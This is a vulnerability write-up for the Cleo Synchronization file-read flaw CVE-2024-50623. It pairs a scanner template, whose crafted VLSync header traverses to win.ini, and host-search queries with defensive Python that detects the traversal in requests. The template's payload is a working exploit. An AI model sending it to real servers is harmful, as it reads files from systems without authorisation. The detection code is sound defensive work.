Vulnerability description
Cleo Synchronization has an arbitrary file read vulnerability: an attacker can obtain the contents of arbitrary files on the server by sending a crafted request.
fofa: server="Cleo"
Quake: server:"Cleo"
id: CVE-2024-50623

info:
  name: Cleo Synchronization 任意文件读取
  author: zan8in
  severity: high
  verified: false
  description: |-
    Cleo Synchronization 存在任意文件读取漏洞,攻击者可通过构造恶意请求获取服务器上的任意文件内容。
    fofa: server="Cleo"
    Quake: server:"Cleo"
  reference:
    - https://github.com/20142995/wxvl/blob/92b3ca2bde795952ef572cbb5549b314581d09b2/doc/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91CVE-2024-50623.md
    - https://mp.weixin.qq.com/s/Snhx9R-R58f9n8Rq4pgNew
  tags: cve,cve2024,cleo,lfi,fileread
  created: 2025/01/01

rules:
  r0:
    request:
      method: GET
      path: /Synchronization
    expression: response.status == 200 && response.headers["server"].icontains("Cleo")
    output:
      search: '"Server: Cleo.*?/(?P<version>[0-9.]+)".bsubmatch(response.raw_header)'
      version: search["version"]
  r1:
    request:
      method: GET
      path: /Synchronization
      headers:
        VLSync: Retrieve;l=Ab1234-RQ0258;n=VLTrader;v={{version}};a=1337;po=5080;s=True;b=False;pp=myEncryptedPassphrase;path=..\..\..\windows\win.ini
    expression: response.status == 200 && response.body.bcontains(b'bit app support')
expression: r0() && r1()
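The template above probes with a GET to /Synchronization whose VLSync header carries a Retrieve command and a path made of ../ segments. A defender watching a reverse proxy or WAF in front of a Cleo host can flag exactly that shape. The following Python is an added example, not part of the template or of Cleo's code: it parses a raw HTTP request, splits the VLSync header into its command and key=value fields (the field layout is inferred from the header value shown in the template, not from Cleo documentation), and reports a finding when a Retrieve path contains a traversal sequence. The sample requests are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import unquote

# Traversal sequence in either separator style: a ".." segment bounded by
# "/" or "\" (or the start/end of the path). Assumption for this example:
# a ".." segment in a Retrieve path is never legitimate and is worth alerting on.
TRAVERSAL_RE = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")


@dataclass
class Finding:
    command: str
    path: str
    reason: str


def parse_vlsync(header_value: str) -> dict:
    """Split 'Retrieve;l=...;n=VLTrader;...;path=...' into the leading command
    plus a dict of key=value fields (layout inferred from the template's header)."""
    parts = header_value.split(";")
    fields = {"_command": parts[0].strip()}
    for part in parts[1:]:
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields


def inspect_request(raw_request: str) -> Optional[Finding]:
    """Return a Finding for a request to /Synchronization whose VLSync header
    asks to Retrieve a path containing '..' segments; otherwise None."""
    head, _, _ = raw_request.partition("\r\n\r\n")
    lines = head.split("\r\n")
    try:
        _method, target, _version = lines[0].split(" ", 2)
    except ValueError:
        return None  # malformed request line; not our concern here
    if not target.startswith("/Synchronization"):
        return None

    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()

    vlsync = headers.get("vlsync")
    if vlsync is None:
        return None

    fields = parse_vlsync(vlsync)
    # Decode percent-encoding so an encoded "%2e%2e" is judged like a literal "..".
    path = unquote(fields.get("path", ""))
    if fields["_command"].lower() == "retrieve" and TRAVERSAL_RE.search(path):
        return Finding(fields["_command"], path,
                       "VLSync Retrieve with directory traversal in path")
    return None


# Constructed sample traffic: one request matching the template's probe and
# two that should not raise a finding.
PROBE = (
    "GET /Synchronization HTTP/1.1\r\n"
    "Host: cleo.example.invalid\r\n"
    "VLSync: Retrieve;l=Ab1234-RQ0258;n=VLTrader;v=5.8.0.0;a=1337;po=5080;"
    "s=True;b=False;pp=myEncryptedPassphrase;path=..\\..\\..\\windows\\win.ini\r\n"
    "\r\n"
)
BENIGN_RETRIEVE = (
    "GET /Synchronization HTTP/1.1\r\n"
    "Host: cleo.example.invalid\r\n"
    "VLSync: Retrieve;n=VLTrader;path=reports\\summary.txt\r\n"
    "\r\n"
)
NO_VLSYNC = "GET /Synchronization HTTP/1.1\r\nHost: cleo.example.invalid\r\n\r\n"

if __name__ == "__main__":
    for label, req in [("probe", PROBE), ("benign", BENIGN_RETRIEVE), ("no header", NO_VLSYNC)]:
        print(label, "->", inspect_request(req))
```

Only the Retrieve command with a traversing path is flagged; a Retrieve of a plain relative file name and a request without the VLSync header both pass, which keeps the rule from firing on ordinary synchronization traffic.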